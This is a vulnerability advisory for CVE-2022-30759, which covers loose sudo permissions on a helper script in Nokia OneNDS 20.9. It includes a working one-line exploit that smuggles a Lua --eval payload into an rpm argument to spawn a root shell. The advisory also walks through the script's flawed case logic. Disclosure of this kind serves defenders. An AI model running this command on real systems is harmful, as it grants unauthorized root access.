Headline
Nokia OneNDS 20.9 Insecure Permissions / Privilege Escalation
Nokia OneNDS 20.9 has loose sudo permissions that can allow users to escalate privileges.
=============================================================================== title: Incorrect Permission Assignment product: Nokia OneNDS 20.9vulnerability type: Security Misconfiguration severity: High CVSS Score: 7.8 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H found on: 04/05/2022 by: Giacomo Sighinolfi <[email protected]> cve: CVE-2022-30759===============================================================================Some sudo permissions can be exploited by some users to escalate to root privileges and execute arbitrary commands on the system.The affected users are: Provgw, notifs, dbmrun, (system users)They can run as root the following script: /opt/cntdb/bin/noscripts_rpm.shIt can be exploited with: sudo /opt/cntdb/bin/noscripts_rpm.sh force-erase "--eval '%{lua:os.execute(\"/bin/sh\")}'"=============================================================================== Detailed analysis:The script accept as first argument one of the these options: install|update|fallback|erase|test-install|test-update|test-erase| force-install|force-update|force-erase and as a second argument an arbitrary rpm package name.If we analyze the switch case code block (row 175) we can see how the first argument influence the execution of the script.175. case "$1" in…224. test-erase)225. TEST_OPTION="--test"226. OPTION="-e"227. ;;…238. force-erase)239. TEST_OPTION="--nodeps"240. OPTION="-e"241. ;;…Using “force-erase” or “test-erase” as the first argument, it creates “OPTION” variable with “-e” as its value. That value allow us to trigger a privilege escalation exploiting the rpm command (row 254) with a particular rpm package name as second parameter passed to the script.…252. if [ $OPTION == "-e" ]253. then254. rpm $OPTION --noscripts $TEST_OPTION $2…===============================================================================
Related news
CVE-2022-30759: Nokia OneNDS 20.9 Insecure Permissions
In Nokia One-NDS (aka Network Directory Server) through 20.9, some Sudo permissions can be exploited by some users to escalate to root privileges and execute arbitrary commands.